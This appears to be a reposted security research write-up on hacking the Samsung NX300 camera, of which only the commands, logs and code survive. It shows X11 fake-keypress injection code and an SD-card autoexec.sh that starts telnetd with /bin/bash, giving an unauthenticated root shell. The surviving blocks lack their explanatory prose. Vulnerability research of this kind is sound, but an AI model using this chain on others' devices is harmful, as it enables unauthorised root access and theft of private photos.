揭秘黑客是如何黑掉三星NX300智能相机的

Type: MIME: application/com.samsungimaging.connectionmanager

Payload: AP_SSC_NX300_0-XX:XX:XX

Type: EXTERNAL: urn:nfc:ext:android.com:pkg

Payload: com.samsungimaging.connectionmanager

megavolt:~# nmap -sS -O nx300

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET

Nmap scan report for nx300.local (192.168.0.147)

Host is up (0.0089s latency).

Not shown: 999 closed ports

PORT     STATE SERVICE

6000/tcp open  X11

MAC Address: A0:21:95:**:**:** (Unknown)

No exact OS matches for host (If you know what OS is running on it, see here ).

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts

-misc-fixed-medium-r-semicondensed–0-0-75-75-c-0-iso8859-1

-misc-fixed-medium-r-semicondensed–13-100-100-100-c-60-iso8859-1

-misc-fixed-medium-r-semicondensed–13-120-75-75-c-60-iso8859-1

6×13

cursor

fixed

georg@megavolt:~$ DISPLAY=nx300:0 xrandr

Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096

LVDS1 connected 480×800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm

480×800        60.0*+

HDMI1 disconnected (normal left inverted right x axis y axis)

georg@megavolt:~$ for i in $(xdotool search ‘.’) ; do xdotool getwindowname $i ; done

Defaulting to search window name, class, and classname

Enlightenment Background

acdaemon,key,receiver

Enlightenment Black Zone (0)

Enlightenment Frame

di-camera-app-nx300

Enlightenment Frame

smart-wifi-app-nx300

GET / HTTP/1.1

Content-Type: text/xml;charset=utf-8

Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*

Accept-Language: ko

User-Agent: Mozilla/4.0

Host: gld.samsungosp.com

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: text/html

Date: Thu, 28 Nov 2013 16:23:48 GMT

Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT

Server: nginx/0.7.65

Content-Length: 7

Connection: keep-alive

200 OK

X-ConnMan-Status: online

X-ConnMan-Client-IP: ###.###.##.###

X-ConnMan-Client-Address: ###.###.##.###

X-ConnMan-Client-Continent: EU

X-ConnMan-Client-Country: DE

X-ConnMan-Client-Region: ##

X-ConnMan-Client-City: ###### (my actual city)

X-ConnMan-Client-Latitude: ##.166698

X-ConnMan-Client-Longitude: ##.666700

X-ConnMan-Client-Timezone: Europe/Berlin

#include <X11/Xlib.h>

#include <X11/Intrinsic.h>

#include <X11/extensions/XTest.h>

#include <unistd.h>

/* Send Fake Key Event */

static void SendKey (Display * disp, KeySym keysym, KeySym modsym){

KeyCode keycode = 0, modcode = 0;

keycode = XKeysymToKeycode (disp, keysym);

if (keycode == 0) return;

XTestGrabControl (disp, True);

/* Generate modkey press */

if (modsym != 0) {

modcode = XKeysymToKeycode(disp, modsym);

XTestFakeKeyEvent (disp, modcode, True, 0);

}

/* Generate regular key press and release */

XTestFakeKeyEvent (disp, keycode, True, 0);

XTestFakeKeyEvent (disp, keycode, False, 0);

/* Generate modkey release */

if (modsym != 0)

XTestFakeKeyEvent (disp, modcode, False, 0);

XSync (disp, False);

XTestGrabControl (disp, False);

}

/* Main Function */

int main (){

Display *disp = XOpenDisplay (NULL);

sleep (1);

/* Send Return */

SendKey (disp, XK_Return, 0);

}

<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>

<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>

<friendlyName>[Camera]NX300</friendlyName>

<manufacturer>Samsung Electronics</manufacturer>

<manufacturerURL> http://www.samsung.com </manufacturerURL>

<modelDescription>Samsung Camera DMS</modelDescription>

<modelName>SP1</modelName>

<modelNumber>1.0</modelNumber>

<modelURL> http://www.samsung.com </modelURL>

<serialNumber>20081113 Folderview</serialNumber>

<sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>

<UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>

<serviceList>

<service>

<serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>

<serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>

<controlURL>/smp_4_</controlURL>

<eventSubURL>/smp_5_</eventSubURL>

<SCPDURL>/smp_3_</SCPDURL>

</service>

<service>

<serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>

<serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>

<controlURL>/smp_7_</controlURL>

<eventSubURL>/smp_8_</eventSubURL>

<SCPDURL>/smp_6_</SCPDURL>

</service>

</serviceList>

<sec:deviceID>

</sec:deviceID>

</device>

<?xml version=”1.0″ encoding=”utf-8″?>

<s:Envelope xmlns:s=” http://schemas.xmlsoap.org/soap/envelope/ ” s:encodingStyle=” http://schemas.xmlsoap.org/soap/encoding/ “>

<s:Body>

<u:GetInfomationResponse xmlns:u=”urn:schemas-upnp-org:service:ContentDirectory:1″>

<GETINFORMATIONRESULT>

<Resolutions>

<Resolution><Width>5472</Width><Height>3648</Height></Resolution>

<Resolution><Width>1920</Width><Height>1080</Height></Resolution>

</Resolutions>

<Flash>

<Supports><Support>off</Support><Support>auto</Support></Supports>

<Defaultflash>auto</Defaultflash>

</Flash>

<FlashDisplay>

<Supports><Support>off</Support><Support>auto</Support></Supports>

<CurrentFlashDisplay>off</CurrentFlashDisplay>

</FlashDisplay>

<ZoomInfo>

<DefaultZoom>0</DefaultZoom>

<MaxZoom>1</MaxZoom>

</ZoomInfo>

<AVAILSHOTS>289</AVAILSHOTS>

<ROTATION>1</ROTATION>

<StreamQuality>

<Quality><Option>high</Option><Option>low</Option></Quality>

<Default>high</Default>

</StreamQuality>

</GETINFORMATIONRESULT>

<StreamUrl>

<QualityHighUrl> http://192.168.102.1:7679/livestream.avi </QualityHighUrl>

<QualityLowUrl> http://192.168.102.1:7679/qvga_livestream.avi </QualityLowUrl>

</StreamUrl>

</u:GetInfomationResponse>

</s:Body>

</s:Envelope>

georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l

total 72

drwxr-xr-x  4 4096 Oct 16  2013 bin/

drwxr-xr-x  3 4096 Oct 16  2013 data/

drwxr-xr-x  3 4096 Oct 16  2013 dev/

drwxr-xr-x 38 4096 Oct 16  2013 etc/

drwxr-xr-x  9 4096 Oct 16  2013 lib/

-rw-r–r–  1  203 Oct 16  2013 make_image.log

drwxr-xr-x  8 4096 Oct 16  2013 mnt/

drwxr-xr-x  3 4096 Oct 16  2013 network/

drwxr-xr-x 16 4096 Oct 16  2013 opt/

drwxr-xr-x  2 4096 Oct 16  2013 proc/

lrwxrwxrwx  1   13 Oct 16  2013 root -> opt/home/root/

drwxr-xr-x  2 4096 Oct 16  2013 sbin/

lrwxrwxrwx  1    8 Oct 16  2013 sdcard -> /mnt/mmc

drwxr-xr-x  2 4096 Oct 16  2013 srv/

drwxr-xr-x  2 4096 Oct 16  2013 sys/

drwxr-xr-x  2 4096 Oct 16  2013 tmp/

drwxr-xr-x 16 4096 Oct 16  2013 usr/

drwxr-xr-x 13 4096 Oct 16  2013 var/

SBS logging begin

Wed Oct 16 14:27:21 KST 2013

WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+rx; use –squash-rino-perm or –nosquash-rino-perm to suppress this warning

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .

./etc/fstab:/dev/mmcblk0    /mnt/mmc        exfat   noauto,user,umask=1000 0 0

./etc/fstab:/dev/mmcblk0p1  /mnt/mmc        exfat   noauto,user,umask=1000 0 0

./usr/sbin/pivot_rootfs_ubi.sh:umount /oldroot/mnt/mmc

./usr/sbin/rcS.pivot:   mkdir -p /mnt/mmc

./usr/sbin/rcS.pivot:       mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc

./usr/bin/inspkg.sh:    mount -t vfat /dev/mmcblk0 /mnt/mmc

./usr/bin/inspkg.sh:    mount -t vfat /dev/mmcblk0p1 /mnt/mmc

./usr/bin/inspkg.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc

./usr/bin/inspkg.sh:find /mnt/mmc -name “*$1*.deb” -exec dpkg -i {} /; 2> /dev/null

./usr/bin/ubi_initial.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc

./usr/bin/ubi_initial.sh:cd /mnt/mmc

./usr/bin/remount_mmc.sh:   nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage

./usr/bin/remount_mmc.sh:       umount /mnt/mmc 2> /dev/null

./usr/bin/remount_mmc.sh:           /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed

./usr/bin/remount_mmc.sh:               /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed

[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]

#! /bin/sh

echo $1

if [ "$#" = "2" ]

then

if [ "$2" = "0" ]

then

echo -e “mount mmcblk0..”

mount -t vfat /dev/mmcblk0 /mnt/mmc

else

echo -e “mount mmcblk0p1…”

mount -t vfat /dev/mmcblk0p1 /mnt/mmc

fi

else

echo -e “mount mmcblk0p1…”

mount -t vfat /dev/mmcblk0p1 /mnt/mmc

fi

find /mnt/mmc -name “*$1*.deb” -exec dpkg -i {} /; 2> /dev/null

echo -e “sync….”

sync

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r inspkg.sh .

georg@megavolt:TIZEN/project/NX300/image/rootfs$

Package: di-camera-app-nx300

Status: install ok installed

Priority: extra

Section: misc

Installed-Size: 87188

Maintainer: Sookyoung Maeng <[snip]@samsung.com>, Jeounggon Yoo <[snip]@samsung.com>

Architecture: armel

Source: di-camera-app

Version: 0.2.387

Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (>= 2.4),

libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,

libecore-x, libedje (>= 0.9.9.060+svn20100304), libeina (>= 1.0.0.001+svn20100831),

libelm, libevas (>= 0.9.9.060+svn20100203), libgcc1 (>= 1:4.4.0),

libglib2.0-0 (>= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,

libmm-utility, libnetwork-0, libnl2 (>= 2.0), libslp-pm-0, libslp-utilx-0,

libstdc++6 (>= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,

libxrandr2 (>= 2:1.2.0), libxtst6, prefman, libproduction-mode,

libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,

libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,

sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,

di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,

diosal

Description: Digital Imaging inhouse application for nx300

#!/bin/sh

#

cp -f *.so /usr/lib

cp -f di-camera-app-nx300 /usr/bin

sync

sync

sync

sleep 1

cd /

startx; di-camera-app &

georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do /

echo “— $f” ; strings $f | grep /mnt/mmc; done

[snip]

— libmisc.so

/mnt/mmc

/mnt/mmc/autoexec.sh

— libnetwork.so

/mnt/mmc/iperf.txt

— libstorage.so

/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e > /tmp/card_result.txt

cp /tmp/card_result.txt /mnt/mmc

/mnt/mmc/auto_run.sh

#!/bin/sh

LOG=/mnt/mmc/autoexec.log

date >> $LOG

id >> $LOG

echo “$PATH” >> $LOG

ps axfu >> $LOG

mount >> $LOG

Fri May  9 06:25:20 UTC 2014

uid=0(root) gid=0(root)

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:/sbin:/usr/local/bin:/usr/scripts

PID     VSZ   RSS STAT  COMMAND

[stripped boring kernel threads and some columns]

1    2988    52 Ss    init

139   11460  1348 S     /usr/bin/system_server

144    2652   188 Ss    dbus-daemon –system

181    3416   772 Ss    /usr/bin/power_manager

232   12268  4608 S<s+  /usr/bin/Xorg :0 -logfile /opt/var/log/Xorg.0.log -ac -noreset /

-r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d

243    2988    76 Ss    init

244    2988    56 Ss    init

245    2988    60 Ss+   init

246    2988    56 Ss+   init

247    2988     8 S     sh /usr/etc/X11/xinitrc

256   20200  2336 S      /_ /usr/bin/enlightenment -profile samsung /

-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it

254   19876     8 S     /usr/bin/launchpad_preloading_preinitializing_daemon

255   12648   816 S     /usr/bin/ac_daemon

259    3600     8 S     dbus-launch –exit-with-session /usr/bin/enlightenment -profile samsung /

-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it

260    2652     8 Ss    /usr/bin/dbus-daemon –fork –print-pid 5 –print-address 7 –session

267  690688 34760 Ssl   di-camera-app-nx300

404    2988   520 S      /_ sh -c /mnt/mmc/autoexec.sh

405    2988   552 S          /_ /bin/sh /mnt/mmc/autoexec.sh

408    2860   996 R              /_ ps axfu

rootfs on / type rootfs (rw)

ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)

devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)

none on /proc type proc (rw,relatime)

tmpfs on /tmp type tmpfs (rw,relatime)

tmpfs on /var/run type tmpfs (rw,relatime)

tmpfs on /var/lock type tmpfs (rw,relatime)

tmpfs on /var/tmp type tmpfs (rw,relatime)

tmpfs on /var/backups type tmpfs (rw,relatime)

tmpfs on /var/cache type tmpfs (rw,relatime)

tmpfs on /var/local type tmpfs (rw,relatime)

tmpfs on /var/log type tmpfs (rw,relatime)

tmpfs on /var/mail type tmpfs (rw,relatime)

tmpfs on /var/opt type tmpfs (rw,relatime)

tmpfs on /var/spool type tmpfs (rw,relatime)

tmpfs on /opt/var/log type tmpfs (rw,relatime)

sysfs on /sys type sysfs (rw,relatime)

/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)

/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)

/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,

dmask=0022,allow_utime=0020,codepage=cp437,iocharset=iso8859-1,namecase=0,errors=remount-ro)

[443] May 09 12:00:45 user ‘root’ has blank password, rejected

lrwxrwxrwx    1    17 May 22  2013 /usr/sbin/telnetd -> ../../bin/busybox

georg@megavolt:~$ telnet nx300

Trying 192.168.0.147…

Connected to nx300.local.

Escape character is ‘^]’.

Connection closed by foreign host.

georg@megavolt:~$ telnet nx300

Trying 192.168.0.147…

telnet: Unable to connect to remote host: Connection refused

telnetd: can’t find free pty

georg@megavolt:~$ telnet nx300

Trying 192.168.0.147…

Connected to nx300.local.

Escape character is ‘^]’.

************************************************************

*                 SAMSUNG LINUX PLATFORM                   *

************************************************************

nx300 login: root

Login incorrect

-l LOGIN        Exec LOGIN on connect

#!/bin/sh

mkdir -p /dev/pts

mount -t devpts none /dev/pts

telnetd -l /bin/bash -F > /mnt/mmc/telnetd.log 2>&1 &

georg@megavolt:~$ telnet nx300

Trying 192.168.0.147…

Connected to nx300.local.

Escape character is ‘^]’.

************************************************************

*                 SAMSUNG LINUX PLATFORM                   *

************************************************************

nx300:/# cat /proc/cpuinfo

Processor       : ARMv7 Processor rev 8 (v7l)

BogoMIPS        : 1395.91

Features        : swp half thumb fastmult vfp edsp neon vfpv3 tls

CPU implementer : 0×41

CPU architecture: 7

CPU variant     : 0×2

CPU part        : 0xc09

CPU revision    : 8

Hardware        : Samsung-DRIMeIV-NX300

Revision        : 0000

Serial          : 0000000000000000

nx300:/# free

total       used       free     shared    buffers     cached

Mem:        512092     500600      11492          0        132      41700

-/+ buffers/cache:     458768      53324

Swap:        30716       8084      22632

nx300:/# df -h /

Filesystem                Size      Used Available Use% Mounted on

ubi0!rootdir            352.5M    290.8M     61.6M  83% /

nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/

total 1584

drwxr-xr-x    2 root     root           520 May 22  2013 .

drwxr-xr-x    3 root     root           232 May 22  2013 ..

-rwxr-xr-x    1 root     root        394775 May 22  2013 SAM_0015.JPG

-rwxr-xr-x    1 root     root        335668 May 22  2013 SAM_0016.JPG   [Obama was here]

-rwxr-xr-x    1 root     root        357591 May 22  2013 SAM_0017.JPG

-rwxr-xr-x    1 root     root        291493 May 22  2013 SAM_0018.JPG

-rwxr-xr-x    1 root     root        232470 May 22  2013 SAM_0019.JPG

nx300:/#

1、增加Wi-Fi隐私锁定功能

2、修改开源许可证

cp /mnt/mmc/wpa_supplicant.conf /tmp/

/usr/bin/wlan.sh start NL 0×8210

/usr/sbin/connmand -W nl80211 -r

/usr/sbin/net-config

sleep 2

dbus-send –system –type=method_call –print-reply –dest=net.connman /

/net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk /

net.connman.Service.Connect